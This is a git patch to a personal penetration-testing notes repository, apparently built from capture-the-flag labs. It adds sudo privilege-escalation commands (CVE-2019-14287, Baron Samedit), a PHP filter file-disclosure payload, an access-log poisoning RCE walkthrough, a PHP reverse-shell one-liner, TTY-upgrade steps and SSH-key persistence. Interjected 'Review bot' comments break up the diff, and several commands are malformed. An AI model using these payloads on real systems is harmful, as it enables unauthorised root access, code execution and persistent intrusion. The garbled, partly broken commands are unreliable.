From 853d3ee2bbbedd67f44cb75cee0da74f2e6e64e0 Mon Sep 17 00:00:00 2001
From: whx
Date: Fri, 27 Aug 2021 00:26:26 +0200
Subject: [PATCH] fuff et al

---
 enumeration/Sublist3r | 1 +
 enumeration/docs/ffuf.md | 41 +++++++++++++++++++++++++
 enumeration/docs/linux_basics.md | 37 ++++++++++++++++++++++
 enumeration/nmap-full.gnmap | 4 ---
 enumeration/nmap-full.nmap | 19 ------------
 enumeration/nmap-full.xml | 35 ---------------------
 exploit/sudo/CVE_2019_14287.md | 9 ++++++
 exploit/sudo/baron_samedit.md | 13 ++++++++
 exploit/web/php/php_base64_filter.md | 6 ++++
 exploit/web/{ => php}/php_image_exif.md | 0
 exploit/web/php/php_user_agent_rce.md | 19 ++++++++++++
 misc/printer_hacking/PRET | 1 +
 misc/printer_hacking/preta.md | 4 +++
 reverse_shells/docs/shell_collection.md | 31 +++++++++++++++++++
 14 files changed, 162 insertions(+), 58 deletions(-)
 create mode 160000 enumeration/Sublist3r
 create mode 100644 enumeration/docs/ffuf.md
 create mode 100644 enumeration/docs/linux_basics.md
 delete mode 100644 enumeration/nmap-full.gnmap
 delete mode 100644 enumeration/nmap-full.nmap
 delete mode 100644 enumeration/nmap-full.xml
 create mode 100644 exploit/sudo/CVE_2019_14287.md
 create mode 100644 exploit/sudo/baron_samedit.md
 create mode 100644 exploit/web/php/php_base64_filter.md
 rename exploit/web/{ => php}/php_image_exif.md (100%)
 create mode 100644 exploit/web/php/php_user_agent_rce.md
 create mode 160000 misc/printer_hacking/PRET
 create mode 100644 misc/printer_hacking/preta.md
 create mode 100644 reverse_shells/docs/shell_collection.md

diff --git a/enumeration/Sublist3r b/enumeration/Sublist3r
new file mode 160000
index 0000000..729d649
--- /dev/null
+++ b/enumeration/Sublist3r
@@ -0,0 +1 @@
+Subproject commit 729d649ec5370730172bf6f5314aafd68c874124
diff --git a/enumeration/docs/ffuf.md b/enumeration/docs/ffuf.md
new file mode 100644
index 0000000..7b8001c
--- /dev/null
+++ b/enumeration/docs/ffuf.md
@@ -0,0 +1,41 @@
+# Fuzz Faster U Fool
+
+## Usage
+```sh
+ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
+```
+* Fuzz dirs
+```sh
+ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
+```
+* Fuzz files
+```sh
+ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
+```
+
+### Fuzz parameters
+```sh
+ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 39
+ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
+```
+* Fuzz values
+```sh
+seq 0 255 | fuff -u 'http:///sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33
+```
+* Fuzz Post Methods
+```sh
+ffuf -u http:///sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
+```
+
+### Fuzz Subdomains
+```sh
+ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
+```
+* Fuzz Vhosts & Server Blocks
+```sh
+ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0
+ffuf -u http://test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.test.com' -fs 0
+```
+
+### Proxy
+* `-replay-proxy ` or `-x `
diff --git a/enumeration/docs/linux_basics.md b/enumeration/docs/linux_basics.md
new file mode 100644
index 0000000..64d29cb
--- /dev/null
+++ b/enumeration/docs/linux_basics.md
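Review bot: The `Fuzz values` example is broken as written: the binary is misspelled `fuff` and the single quote opened before `http://` is never closed, so the shell waits for more input instead of running anything; it should read `seq 0 255 | ffuf -u 'http://<target>/sqli-labs/Less-1/?id=FUZZ' -c -w - -fw 33`. The `-fw 39`, `-fw 33` and `-fs 1435` filters are baselines measured against one specific lab target and will hide or flood results elsewhere, so a one-line caveat such as `<!-- -fw/-fs values are target-specific: measure a baseline response first or use -ac -->` would save readers a wasted run. The `-fs 0` in the vhost examples is unlikely to filter anything, since the default vhost normally returns a non-empty page; the usual approach is to filter on the size of that default response (or `-ac`). The empty hosts in `http:///FUZZ` look like a stripped placeholder rather than intent; if so, `http://<target>/FUZZ` restores it.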
@@ -0,0 +1,37 @@
+# Linux Basic Enumeration
+```sh
+less ~/.bash_history
+```
+```sh
+cat /etc/*-release
+cat /proc/version
+uname -a
+```
+```sh
+sudo -V
+sudo -L
+```
+* Check if is writeable
+```sh
+vim /etc/passwd
+vim /etc/hosts
+```
+```sh
+crontab -l
+```
+
+* Find interesting files
+```sh
+find / -perm /6000 2>/dev/null
+find / -perm -u=s -type f 2>/dev/null
+find / -type f -name "*.log" 2>/dev/null
+find / -type f -name "*.bak" 2>/dev/null
+find / -type f -name "*.conf" 2>/dev/null
+```
+
+* Open Sockets
+```sh
+lsof -i
+netstat -natup
+ss -natup
+```
diff --git a/enumeration/nmap-full.gnmap b/enumeration/nmap-full.gnmap
deleted file mode 100644
index c7edec2..0000000
--- a/enumeration/nmap-full.gnmap
+++ /dev/null
@@ -1,4 +0,0 @@
-# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
-Host: 10.10.156.247 () Status: Up
-Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp/////
-# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
diff --git a/enumeration/nmap-full.nmap b/enumeration/nmap-full.nmap
deleted file mode 100644
index 7ffc626..0000000
--- a/enumeration/nmap-full.nmap
+++ /dev/null
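Review bot: Under `Check if is writeable`, opening `/etc/passwd` and `/etc/hosts` in `vim` is a poor test: it can leave swap files behind, a slip saves changes, and it still does not tell you whether write permission exists. Replace the block with `ls -la /etc/passwd /etc/hosts /etc/shadow /etc/sudoers` plus `test -w /etc/passwd && echo 'passwd writable'`, and fix the heading to `Check which files are writeable`. `sudo -L` only prints sudoers option descriptions (recent sudo releases appear not to accept it at all, so verify); the step that matters for privilege escalation is `sudo -l`, which lists what the current user may run, and it should appear next to `sudo -V`. `crontab -l` covers only the current user's crontab; `cat /etc/crontab; ls -la /etc/cron.*` is needed to see system jobs.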
@@ -1,19 +0,0 @@
-# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
-Nmap scan report for 10.10.156.247
-Host is up (0.064s latency).
-Not shown: 64293 closed ports, 1231 filtered ports
-Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
-PORT STATE SERVICE
-135/tcp open msrpc
-139/tcp open netbios-ssn
-445/tcp open microsoft-ds
-3389/tcp open ms-wbt-server
-31337/tcp open Elite
-49152/tcp open unknown
-49153/tcp open unknown
-49154/tcp open unknown
-49155/tcp open unknown
-49161/tcp open unknown
-49162/tcp open unknown
-
-# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
diff --git a/enumeration/nmap-full.xml b/enumeration/nmap-full.xml
deleted file mode 100644
index 40c82ff..0000000
--- a/enumeration/nmap-full.xml
+++ /dev/null
@@ -1,35 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/exploit/sudo/CVE_2019_14287.md b/exploit/sudo/CVE_2019_14287.md
new file mode 100644
index 0000000..8c9a582
--- /dev/null
+++ b/exploit/sudo/CVE_2019_14287.md
@@ -0,0 +1,9 @@
+# CVE-2019-14287
+
+* Versions < 1.8.28
+
+## Usage
+* Integer overflow with resulting root status.
+```sh
+sudo -u#-1
+```
diff --git a/exploit/sudo/baron_samedit.md b/exploit/sudo/baron_samedit.md
new file mode 100644
index 0000000..eaf8fab
--- /dev/null
+++ b/exploit/sudo/baron_samedit.md
@@ -0,0 +1,13 @@
+# CVE-2021-3156 Baron Samedit
+
+* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
+* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
+* Heap based overflow
+* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
+* Check vulnerability via
+```sh
+sudoedit -s '\' $(python -c "print('\x41' * 10000)")
+```
+
+
+
diff --git a/exploit/web/php/php_base64_filter.md b/exploit/web/php/php_base64_filter.md
new file mode 100644
index 0000000..cac118b
--- /dev/null
+++ b/exploit/web/php/php_base64_filter.md
@@ -0,0 +1,6 @@
+# PHP Filter
+
+* Include into GET query, and get index page, for example
+```sh
+/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
+```
diff --git a/exploit/web/php_image_exif.md b/exploit/web/php/php_image_exif.md
similarity index 100%
rename from exploit/web/php_image_exif.md
rename to exploit/web/php/php_image_exif.md
diff --git a/exploit/web/php/php_user_agent_rce.md b/exploit/web/php/php_user_agent_rce.md
new file mode 100644
index 0000000..402710a
--- /dev/null
+++ b/exploit/web/php/php_user_agent_rce.md
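Review bot: `sudo -u#-1` on its own runs nothing; the invocation needs a command, e.g. `sudo -u#-1 /bin/bash` (the equivalent `-u#4294967295` also works). The entry should also state the precondition, since the bug is only reachable when sudoers lets the user run a command as any user except root, typically a `(ALL, !root)` runas spec, so a `sudo -l` check for such a rule belongs before the usage line. The description `Integer overflow with resulting root status` is misleading: sudo fails to reject user ID -1 (4294967295), which `setresuid()` treats as "leave unchanged", so the command keeps the uid 0 that sudo already holds; `Sudo does not validate uid -1 / 4294967295, so setresuid() leaves the process at uid 0` describes it more accurately.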
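Review bot: The `Check vulnerability via` command is a crash test but the file never says how to read the result; add `# a segfault means vulnerable; a clean exit or usage text means patched` after it. Qualys's own detection is simpler and does not depend on `python` being present: `sudoedit -s /` prints `sudoedit: /: not a regular file` on a vulnerable build and the usage message on a fixed one, and is worth listing as the first check. The public PoCs are distro-specific (heap layout and library offsets differ), so a note that blasty's PoC must have the matching target selected or adjusted would set expectations; the version range given matches the Qualys advisory.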
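Review bot: The example stops at the request and never says how to recover the source: the response is base64, so the note should end with decoding, e.g. `curl -s 'http://<target>/?view=php://filter/read=convert.base64-encode/resource=./dog/../index' | base64 -d`. The `./dog/../` prefix and the missing `.php` suffix only make sense if the vulnerable page prepends a directory and appends the extension itself, which is an inference from this one example and should be spelled out: `# the app prepends ./dog/ and appends .php; adjust resource= to match`. Since `php://filter` is a local stream wrapper it does not need `allow_url_include`, which is worth stating so readers reach for it when remote includes fail.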
@@ -0,0 +1,19 @@
+# RCE inside HTTP Request
+
+* User Agent can be filled with php code
+```sh
+GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
+Host: 10.10.59.238
+User-Agent: :/shell.php')); ?>
+[...]
+```
+
+* copied from browser as curl command:
+```
+curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: "
+```
+* go to the access log
+```sh
+10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
+```
+* Afterwards visit `10.10.211.157/monkey.php`
diff --git a/misc/printer_hacking/PRET b/misc/printer_hacking/PRET
new file mode 160000
index 0000000..40505ce
--- /dev/null
+++ b/misc/printer_hacking/PRET
@@ -0,0 +1 @@
+Subproject commit 40505ce3869707efb7890b55519b3ee829adefbd
diff --git a/misc/printer_hacking/preta.md b/misc/printer_hacking/preta.md
new file mode 100644
index 0000000..cb8bdab
--- /dev/null
+++ b/misc/printer_hacking/preta.md
@@ -0,0 +1,4 @@
+# Printer Hacking
+
+* [Preta](https://github.com/RUB-NDS/PRET)
+* [Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)
diff --git a/reverse_shells/docs/shell_collection.md b/reverse_shells/docs/shell_collection.md
new file mode 100644
index 0000000..d22380b
--- /dev/null
+++ b/reverse_shells/docs/shell_collection.md
@@ -0,0 +1,31 @@
+# Upgrade Reverse Shell
+
+## Via interpreter
+### PHP
+* reverse shell
+```php
+php -r '$sock=fsockopen("", );exec("/bin/sh -i <&3 >&3 2>&3");'
+```
+```php
+php -r 'exec ("/bin/bash")";'
+```
+* Sometimes even
+```php
+php -e 'exec "/bin/bash";'
+```
+
+### Python
+```python
+python -c 'import pty; pty.spawn("/bin/bash")'
+```
+
+## Next
+1. `ctrl` + `z`
+2. `stty echo -raw`
+3. `fg`
+4. `export TERM=xterm`
+
+## Via SSH
+* `ssh-keygen`
+* copy priv key and `chmod 600`
+* `cat id_rsa.pub > authorized_keys` on target
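Review bot: The three snippets disagree about the target: the first and third include `/var/log/apache2/access.log` (on `10.10.59.238` and `10.10.211.157` respectively) while the curl command uses `/var/log/apache/access.log`; pick one log path (`apache2` is the Debian/Ubuntu name) and one host placeholder so the steps can actually be followed in order. The User-Agent payload appears to have been lost in this rendering (only `:/shell.php')); ?>` and an empty `-H "User-Agent: "` survive), so the committed file should be checked for the full `<?php ... ?>` line, and the written file name should match the final step, which visits `monkey.php` rather than `shell.php`. A caveat worth adding under the first snippet: `<!-- a syntax error in the poisoned User-Agent breaks every later include of the log until it rotates; test the payload locally first -->`. The `&ext=` parameter that neutralises the extension the page appends is implied but never explained; one sentence on it would help.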
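Review bot: Step 2 of `Next` is inverted: `stty echo -raw` re-enables echo and switches raw mode off, the opposite of what a TTY upgrade needs; it should be `stty raw -echo; fg`, with a closing step `reset` (or `stty sane`) to restore the local terminal afterwards. Two of the PHP one-liners cannot run as written: `php -r 'exec ("/bin/bash")";'` has a stray `"` after the closing parenthesis, and `php -e 'exec "/bin/bash";'` is wrong twice over, since `-e` is not an evaluate flag and `exec` needs parentheses; `php -r 'exec("/bin/bash");'` replaces both. In `Via SSH`, `cat id_rsa.pub > authorized_keys` overwrites any keys already present on the target; use `>>`, pair it with `chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys`, and make explicit which side keeps the private key (generate on the attacker, append only the public key on the target). The `fsockopen("", )` host and port look stripped in this rendering, so verify the committed file.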